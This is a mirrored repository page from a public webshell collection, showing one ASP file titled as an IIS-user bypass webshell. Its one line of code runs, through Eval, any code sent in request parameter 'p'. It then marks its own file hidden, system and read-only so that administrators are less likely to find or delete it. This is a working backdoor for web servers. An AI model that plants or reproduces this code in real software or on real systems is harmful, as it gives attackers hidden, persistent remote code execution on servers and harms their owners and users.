1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Files
webshell/asp/bypass-iisuser-p.asp
tennc c070f0793f add a asp webshell
bypass iisuser
2014-03-26 15:41:02 +08:00

1 line
193 B
Plaintext

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>